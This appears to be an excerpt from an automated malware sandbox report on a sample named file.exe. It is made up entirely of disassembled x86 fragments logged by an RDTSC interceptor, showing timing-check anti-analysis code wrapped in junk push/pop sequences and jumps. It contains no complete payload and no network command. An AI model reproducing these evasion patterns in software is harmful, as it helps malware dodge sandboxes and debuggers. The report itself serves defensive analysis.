                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788E64 second address: 611A47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F76A5412C13h 0x00000010 pop eax 0x00000011 call 00007F76A5412C0Bh 0x00000016 mov dword ptr [ebp+122D1EB4h], ecx 0x0000001c pop edi 0x0000001d push dword ptr [ebp+122D03B5h] 0x00000023 or edx, dword ptr [ebp+122D2998h] 0x00000029 call dword ptr [ebp+122D36CCh] 0x0000002f pushad 0x00000030 ja 00007F76A5412C1Ch 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D23A0h], ebx 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 cld 0x00000043 mov dword ptr [ebp+122D2CC0h], eax 0x00000049 pushad 0x0000004a jmp 00007F76A5412C12h 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D1FBEh], ecx 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D1EA0h], eax 0x00000065 jnc 00007F76A5412C11h 0x0000006b lodsw 0x0000006d clc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 cld 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 pushad 0x00000078 mov esi, 33349F84h 0x0000007d xor dword ptr [ebp+122D1EA0h], edx 0x00000083 popad 0x00000084 push eax 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F20 second address: 788F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53B3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F3D second address: 788F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F43 second address: 788F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F47 second address: 788F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F4B second address: 788F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F76A53B3878h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F5F second address: 788F64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F64 second address: 788F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F76A53B3880h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F82 second address: 789036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A5412C0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, 4BAB6DD8h 0x00000010 jmp 00007F76A5412C0Ah 0x00000015 push 00000003h 0x00000017 movzx esi, si 0x0000001a push 00000000h 0x0000001c sub dword ptr [ebp+122D1EAEh], edi 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D17FAh], ecx 0x0000002a push 98D07541h 0x0000002f jne 00007F76A5412C11h 0x00000035 add dword ptr [esp], 272F8ABFh 0x0000003c jmp 00007F76A5412C0Fh 0x00000041 sub dword ptr [ebp+122D1EA5h], ebx 0x00000047 lea ebx, dword ptr [ebp+1244AD2Fh] 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F76A5412C08h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 and ecx, 6D78F3DEh 0x0000006d xchg eax, ebx 0x0000006e push edx 0x0000006f jg 00007F76A5412C0Ch 0x00000075 pop edx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a jmp 00007F76A5412C0Bh 0x0000007f pushad 0x00000080 popad 0x00000081 popad 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789036 second address: 78903C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789091 second address: 789097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789097 second address: 78909C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78909C second address: 7890BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F76A5412C06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76A5412C0Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7890BA second address: 78916D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A53B3888h 0x00000008 jl 00007F76A53B3876h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F76A53B3878h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D2A50h] 0x00000034 jmp 00007F76A53B387Ch 0x00000039 call 00007F76A53B3879h 0x0000003e push eax 0x0000003f jmp 00007F76A53B3888h 0x00000044 pop eax 0x00000045 push eax 0x00000046 jmp 00007F76A53B3882h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push ecx 0x00000050 jmp 00007F76A53B3881h 0x00000055 pop ecx 0x00000056 mov eax, dword ptr [eax] 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78916D second address: 789173 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789173 second address: 789208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53B387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007F76A53B3888h 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jc 00007F76A53B3885h 0x0000001b jmp 00007F76A53B387Fh 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 mov dx, 2D5Ah 0x00000027 mov dl, 80h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1C46h], edx 0x00000031 push 00000003h 0x00000033 jc 00007F76A53B3896h 0x00000039 jg 00007F76A53B3890h 0x0000003f push 9024FBBEh 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F76A53B3883h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7892E4 second address: 789341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A5412C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D2C74h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F76A5412C08h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1EA5h], edi 0x00000034 push 7D9FA463h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F76A5412C10h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789341 second address: 789345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789345 second address: 7893CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F76A5412C06h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 xor dword ptr [esp], 7D9FA4E3h 0x00000018 mov dword ptr [ebp+122D3329h], ebx 0x0000001e mov dword ptr [ebp+122D1B93h], esi 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F76A5412C08h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov edi, dword ptr [ebp+122D29E4h] 0x00000046 push 00000000h 0x00000048 mov edx, dword ptr [ebp+122D1B77h] 0x0000004e mov ecx, dword ptr [ebp+122D2C74h] 0x00000054 push 00000003h 0x00000056 mov edi, ebx 0x00000058 mov edi, ebx 0x0000005a push A26EAFC0h 0x0000005f pushad 0x00000060 pushad 0x00000061 jmp 00007F76A5412C12h 0x00000066 push edx 0x00000067 pop edx 0x00000068 popad 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A965D second address: 7A9698 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A4C44F4Eh 0x00000008 push ecx 0x00000009 jmp 00007F76A4C44F4Bh 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F76A4C44F46h 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F76A4C44F4Ch 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9698 second address: 7A969E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A969E second address: 7A96A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96A3 second address: 7A96B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A53AB96Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96B6 second address: 7A96BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96BF second address: 7A96C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96C3 second address: 7A96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA02C second address: 7AA030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA030 second address: 7AA043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F76A4C44F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA162 second address: 7AA175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76A53AB96Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA175 second address: 7AA179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAA88 second address: 7AAABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB96Ch 0x00000007 jl 00007F76A53AB966h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 ja 00007F76A53AB966h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F76A53AB973h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAD5B second address: 7AAD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAD68 second address: 7AAD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB1A6 second address: 7AB1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F76A4C44F54h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F76A4C44F4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F76A4C44F4Ch 0x0000001e ja 00007F76A4C44F46h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ACA84 second address: 7ACAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F76A53AB966h 0x0000000a jmp 00007F76A53AB978h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA2E second address: 7AEA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA34 second address: 7AEA4A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEA4A second address: 7AEA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE067 second address: 7AE06D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE06D second address: 7AE071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE071 second address: 7AE083 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B699F second address: 7B69AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B69AA second address: 7B69B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76A53AB966h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6AEF second address: 7B6AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6AF3 second address: 7B6AF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6D8B second address: 7B6D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB7A0 second address: 7BB7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBADF second address: 7BBAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC49F second address: 7BC4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC8D9 second address: 7BC8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9DD second address: 7BC9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9E1 second address: 7BC9E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9E7 second address: 7BC9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9ED second address: 7BCA07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F76A4C44F4Dh 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA07 second address: 7BCA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA0D second address: 7BCA53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F76A4C44F48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edi 0x0000002b pop edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA53 second address: 7BCA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA58 second address: 7BCA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCA5D second address: 7BCA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A53AB96Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F76A53AB96Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA37 second address: 7BEA59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA59 second address: 7BEA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA5D second address: 7BEA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF557 second address: 7BF577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76A53AB975h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF577 second address: 7BF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF57B second address: 7BF57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF57F second address: 7BF5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push eax 0x00000009 mov dword ptr [ebp+122D2128h], edi 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D2C24h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F76A4C44F48h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 push eax 0x00000037 jmp 00007F76A4C44F4Fh 0x0000003c pop eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF5CE second address: 7BF5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007F76A53AB970h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C001C second address: 7C0020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C0BB9 second address: 7C0BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1E64 second address: 7C1E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3E5B second address: 7C3E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3E67 second address: 7C3E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C531C second address: 7C5321 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5321 second address: 7C532F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C74BC second address: 7C74E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A53AB968h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F76A53AB979h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C532F second address: 7C5335 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5335 second address: 7C533B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C533B second address: 7C533F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C85D8 second address: 7C85DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C948A second address: 7C948F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
